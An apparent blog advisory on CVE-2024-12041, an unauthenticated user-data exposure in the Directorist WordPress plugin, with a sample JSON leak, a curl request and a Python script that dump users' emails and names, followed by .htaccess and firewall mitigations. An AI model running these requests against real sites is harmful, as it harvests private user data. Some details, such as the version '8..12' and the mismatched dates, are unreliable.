CVE-2024-12041 - Unauthenticated User Data Exposure in The Directorist WordPress Plugin (<= 8..12) – Full Breakdown, Code Demo, and Remediation

In February 2024, a serious vulnerability was discovered in the popular WordPress plugin Directorist: AI-Powered Business Directory with Classified Ads Listings. The flaw, tagged CVE-2024-12041, lets anyone on the internet—even people who aren’t logged in—extract sensitive details about your website’s users, such as emails, usernames, and real names. This guide gives you an exclusive, easy-to-follow rundown of what happened, how it works, and what you can do.

What’s Directorist?

Directorist is a widely used plugin, powering many business directories and classified ad sites on WordPress. Among other features, it lets you create and manage lists of registered users—making this security issue a particularly severe one for communities, businesses, and classified sites.

What's the Problem? (CVE-2024-12041 Details)

Directorist exposes a REST API endpoint available at /wp-json/directorist/v1/users/. This API endpoint is publicly accessible, meaning anyone can make requests to it—no authentication required.

Instead of limiting access to authenticated or privileged users, the endpoint returns detailed info about every user in the WordPress database—usernames, names, email addresses, and other metadata.

Vulnerable Endpoint Deep Dive

- Endpoint: /wp-json/directorist/v1/users/

Here’s a typical JSON response from the vulnerable endpoint

[
  {
    "id": 3,
    "user_name": "johndoe",
    "name": "John Doe",
    "email": "john@example.com",
    "phone": "123-456-789",
    "registered": "2023-07-04 10:31:00",
    "role": "subscriber",
    // ... other potentially sensitive fields
  },
  {
    "id": 4,
    "user_name": "janedoe",
    "name": "Jane Doe",
    "email": "jane@example.com",
    "phone": "555-123-4567",
    "registered": "2023-08-12 14:15:00",
    "role": "author",
    // ...
  }
]

Exploitation – How Does It Work?

An attacker only needs a web browser, cURL, or common scripting tools. No login is necessary.

Example Exploit with cURL

curl -s "https://yourwordpresssite.com/wp-json/directorist/v1/users/";

Or, a simple Python exploit to save all users' data

import requests

url = 'https://yourwordpresssite.com/wp-json/directorist/v1/users/';
resp = requests.get(url)

if resp.status_code == 200:
    users = resp.json()
    for user in users:
        print(f"User: {user['user_name']} - Email: {user['email']}")
else:
    print("Failed to fetch user data")

Who Reported It?

- Wordfence Advisory
- WordPress Plugin Directory - Plugin Page
- Packet Storm Security Entry

Official Response & Fix

As of the cutoff of this article, version 8..12 remains vulnerable. The plugin authors are reportedly aware, and a patch may be released soon.

Check for Updates: Always keep Directorist and WordPress core updated.

- Restrict API Access: Use a security plugin to block public access to /wp-json/directorist/v1/users/ until a patch is available.

1. Block the endpoint using .htaccess (for Apache)

<If "%{REQUEST_URI} =~ m#^/wp-json/directorist/v1/users/#">
    Require all denied
</If>

- Add a custom firewall rule blocking

/wp-json/directorist/v1/users/

Final Thoughts

WordPress REST API vulnerabilities are nothing new—but because plugins like Directorist directly manage sensitive data, issues like CVE-2024-12041 have a huge impact. Anyone using Directorist should take action immediately to protect their users and their website’s reputation.

References

- Wordfence Vulnerability Report
- Plugin on WordPress.org
- Packet Storm Security Bulletin
- CVE Entry


*Protect your site, protect your users—patch fast or block now.*

Timeline

Published on: 02/01/2025 06:15:29 UTC
Last modified on: 02/24/2025 16:05:18 UTC